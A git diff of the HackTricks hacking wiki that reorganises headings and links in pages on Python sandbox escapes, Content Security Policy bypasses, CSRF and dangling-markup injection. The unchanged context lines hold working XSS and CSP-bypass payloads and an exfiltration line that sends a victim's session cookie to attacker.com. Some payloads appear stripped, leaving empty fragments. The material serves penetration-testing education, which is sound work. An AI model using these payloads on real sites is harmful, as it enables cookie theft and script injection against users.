begging of this post you can see **how to execute any python code using the `compile` function**. This is really interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\ Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF). @@ -856,19 +855,19 @@ f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdi f(42) ``` -# Decompiling Compiled Python +## Decompiling Compiled Python Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code. **Check out this tutorial**: -{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} -[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) +{% content-ref url="../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %} +[.pyc.md](../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md) {% endcontent-ref %} -# Misc Python +## Misc Python -## Assert +### Assert Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\ Therefore, checks like @@ -884,7 +883,7 @@ def check_permission(super_user): will be bypassed -# References +## References * [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/) * [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/) @@ -893,7 +892,6 @@ will be bypassed * [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html) * [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) -
Support HackTricks and get benefits! @@ -909,5 +907,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/mobile-pentesting/android-app-pentesting/README.md b/mobile-pentesting/android-app-pentesting/README.md index bf8eb4bd8..c3d5dd82d 100644 --- a/mobile-pentesting/android-app-pentesting/README.md +++ b/mobile-pentesting/android-app-pentesting/README.md @@ -202,7 +202,7 @@ Then, decompress all the DLsL using [**xamarin-decompress**](https://github.com/ python3 xamarin-decompress.py -o /path/to/decompressed/apk ``` -and finally you can use [**these recommended tools**](../../reversing/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs. +and finally you can use [**these recommended tools**](../../group-1/reversing-tools-basic-methods/#net-decompiler) to **read C# code** from the DLLs. ### Automated Static Code Analysis diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md index 8ce29128a..1d8c44198 100644 --- a/pentesting-web/content-security-policy-csp-bypass/README.md +++ b/pentesting-web/content-security-policy-csp-bypass/README.md @@ -1,4 +1,4 @@ - +# Content Security Policy (CSP) Bypass
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
- -# What is CSP +## What is CSP Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:` @@ -35,12 +34,12 @@ Implemented via meta tag: ``` -## Headers +### Headers * `Content-Security-Policy` * `Content-Security-Policy-Report-Only`This one won't block anything, only send reports (use in Pre environment). -# Defining resources +## Defining resources CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`. @@ -56,7 +55,7 @@ media-src https://videos.cdn.mozilla.net; object-src 'none'; ``` -## Directives +### Directives * **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution. * **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default. @@ -75,7 +74,7 @@ object-src 'none'; * **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten. * **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy. -## **Sources** +### **Sources** * \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes * **self**: This source defines that loading of resources on the page is allowed from the same domain. @@ -87,9 +86,9 @@ object-src 'none'; * **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy. * **sha256-\**: Whitelist scripts with an specific sha256 hash -# Unsafe Scenarios +## Unsafe Scenarios -## 'unsafe-inline' +### 'unsafe-inline' ```yaml Content-Security-Policy: script-src https://google.com 'unsafe-inline'; @@ -97,13 +96,13 @@ Content-Security-Policy: script-src https://google.com 'unsafe-inline'; Working payload: `"/>` -### self + 'unsafe-inline' via Iframes +#### self + 'unsafe-inline' via Iframes {% content-ref url="csp-bypass-self-+-unsafe-inline-with-iframes.md" %} [csp-bypass-self-+-unsafe-inline-with-iframes.md](csp-bypass-self-+-unsafe-inline-with-iframes.md) {% endcontent-ref %} -## 'unsafe-eval' +### 'unsafe-eval' ```yaml Content-Security-Policy: script-src https://google.com 'unsafe-eval'; @@ -111,7 +110,7 @@ Content-Security-Policy: script-src https://google.com 'unsafe-eval'; Working payload: `` -## Wildcard +### Wildcard ```yaml Content-Security-Policy: script-src 'self' https://google.com https: data *; @@ -124,7 +123,7 @@ Working payload: "/>'> ``` -## Lack of object-src and default-src +### Lack of object-src and default-src ```yaml Content-Security-Policy: script-src 'self' ; @@ -138,7 +137,7 @@ Working payloads: ``` -## File Upload + 'self' +### File Upload + 'self' ```yaml Content-Security-Policy: script-src 'self'; object-src 'none' ; @@ -158,7 +157,7 @@ Moreover, even if you could upload a **JS code inside** a file using a extension From here, if you find a XSS and a file upload, and you manage to find a **misinterpreted extension**, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot ([some polyglot examples here](https://github.com/Polydet/polyglot-database)). -## Third Party Endpoints + 'unsafe-eval' +### Third Party Endpoints + 'unsafe-eval' ```yaml Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval'; @@ -171,7 +170,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}}
``` -### Other payloads: +#### Other payloads: ```markup @@ -187,7 +186,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
``` -## Third Party Endpoints + JSONP +### Third Party Endpoints + JSONP ```http Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none'; @@ -204,22 +203,22 @@ Scenarios like this where `script-src` is set to `self` and a particular domain The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted. -## Folder path bypass +### Folder path bypass If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.\ This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js` Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output) -## Iframes JS execution +### Iframes JS execution {% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %} [iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md) {% endcontent-ref %} -## missing **base-uri** +### missing **base-uri** -If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection.md). +If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/). Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\ If the vulnerable page is loaded with **httpS**, make use a httpS url in the base. @@ -228,7 +227,7 @@ If the vulnerable page is loaded with **httpS**, make use a httpS url in the bas ``` -## AngularJS events +### AngularJS events Depending on the specific policy, the CSP will block JavaScript events. However, AngularJS defines its own events that can be used instead. When inside an event, AngularJS defines a special `$event` object, which simply references the browser event object. You can use this object to perform a CSP bypass. On Chrome, there is a special property on the `$event/event` object called `path`. This property contains an array of objects that causes the event to be executed. The last property is always the `window` object, which we can use to perform a sandbox escape. By passing this array to the `orderBy` filter, we can enumerate the array and use the last element (the `window` object) to execute a global function, such as `alert()`. The following code demonstrates this: @@ -239,7 +238,7 @@ Depending on the specific policy, the CSP will block JavaScript events. However, **Find other Angular bypasses in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) -## AngularJS and whitelisted domain +### AngularJS and whitelisted domain ``` Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url; @@ -254,11 +253,11 @@ Working payloads: ng-app"ng-csp ng-click=$event.view.alert(1337)> ``` -## Bypass CSP with dangling markup +### Bypass CSP with dangling markup -Read [how here](../dangling-markup-html-scriptless-injection.md). +Read [how here](../dangling-markup-html-scriptless-injection/). -## 'unsafe-inline'; img-src \*; via XSS +### 'unsafe-inline'; img-src \*; via XSS ``` default-src 'self' 'unsafe-inline'; img-src *; @@ -276,7 +275,7 @@ From: [https://github.com/ka0labs/ctf-writeups/tree/master/2019/nn9ed/x-oracle]( You could also abuse this configuration to **load javascript code inserted inside an image**. If for example, the page allows to load images from twitter. You could **craft** an **special image**, **upload** it to twitter and abuse the "**unsafe-inline**" to **execute**a JS code (as a regular XSS) that will **load** the **image**, **extract** the **JS** from it and **execute** **it**: [https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/](https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/) -## img-src \*; via XSS (iframe) - Time attack +### img-src \*; via XSS (iframe) - Time attack Notice the lack of the directive `'unsafe-inline'`\ This time you can make the victim **load** a page in **your control** via **XSS** with a ` ``` -## [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) +### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/) ```javascript document.querySelector('DIV').innerHTML=""; ``` -## Leaking Information CSP + Iframe +### Leaking Information CSP + Iframe Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com** is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\ **Also the page redirected isn't allowed by the security policy, but the page that redirects is.** @@ -368,11 +367,11 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http Trick from [**here**](https://ctftime.org/writeup/29310). -# CSP Exfiltration Bypasses +## CSP Exfiltration Bypasses If there is a strict CSP that doesn't allow you to **interact with external servers**, there some things you can always do to exfiltrate the information. -## Location +### Location You could just update the location to send to the attackers server the secret information: @@ -381,7 +380,7 @@ var sessionid = document.cookie.split('=')[1]+"."; document.location = "https://attacker.com/?" + sessionid; ``` -## Meta tag +### Meta tag You could redirect injecting a meta tag (this is just a redirect, this won't leak content) @@ -389,7 +388,7 @@ You could redirect injecting a meta tag (this is just a redirect, this won't lea ``` -## DNS Prefetch +### DNS Prefetch To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\ You can indicate a browser to pre-resolve a hostname with: `` @@ -421,7 +420,7 @@ X-DNS-Prefetch-Control: off Apparently this technique doesn't work in headless browsers (bots) {% endhint %} -## WebRTC +### WebRTC In several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP. @@ -432,13 +431,13 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp)); However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy). -If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)**** +If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)\*\*\*\* -# Policy Injection +## Policy Injection **Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection) -## Chrome +### Chrome If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses: @@ -450,21 +449,21 @@ script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline' Because this directive will **overwrite existing script-src directives**.\ You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E) -## Edge +### Edge In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E) -# Checking CSP Policies Online +## Checking CSP Policies Online * [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com) * [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/) -# Automatically creating CSP +## Automatically creating CSP [https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy) -# References +## References {% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %} @@ -474,7 +473,6 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y {% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme" %} -
Support HackTricks and get benefits! @@ -490,5 +488,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md index a4697628d..b36c02377 100644 --- a/pentesting-web/csrf-cross-site-request-forgery.md +++ b/pentesting-web/csrf-cross-site-request-forgery.md @@ -183,7 +183,7 @@ To set the domain name of the server in the URL that the Referrer is going to se ### **Exfiltrating CSRF Token** -If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability. +If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability. ### **GET using HTML tags** diff --git a/pentesting-web/dangling-markup-html-scriptless-injection.md b/pentesting-web/dangling-markup-html-scriptless-injection/README.md similarity index 91% rename from pentesting-web/dangling-markup-html-scriptless-injection.md rename to pentesting-web/dangling-markup-html-scriptless-injection/README.md index c5d3ef9bb..f8f9f07cf 100644 --- a/pentesting-web/dangling-markup-html-scriptless-injection.md +++ b/pentesting-web/dangling-markup-html-scriptless-injection/README.md @@ -1,4 +1,4 @@ - +# Dangling Markup - HTML scriptless injection
@@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Resume -# Resume - -This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.\ +This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\ It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution. -Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...). +Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...). -# Main Applications +## Main Applications -## Stealing clear text secrets +### Stealing clear text secrets If you inject `test ``` -## Stealing forms +### Stealing forms ```markup @@ -68,11 +67,11 @@ steal me'test Then, the forms that send data to path (like `
`) will send the data to the malicious domain. -## Stealing forms 2 +### Stealing forms 2 Set a form header: `` this will overwrite the next form header and all the data from the form will be sent to the attacker. -## Stealing forms 3 +### Stealing forms 3 The button can change the URL where the information of the form is going to be sent with the attribute "formaction": @@ -82,7 +81,7 @@ The button can change the URL where the information of the form is going to be s An attacker can use this to steal the information. -## Stealing clear text secrets 2 +### Stealing clear text secrets 2 Using the latest mentioned technique to steal forms (injecting a new form header) you can then inject a new input field: @@ -98,7 +97,7 @@ You can do the same thing injecting a form and an `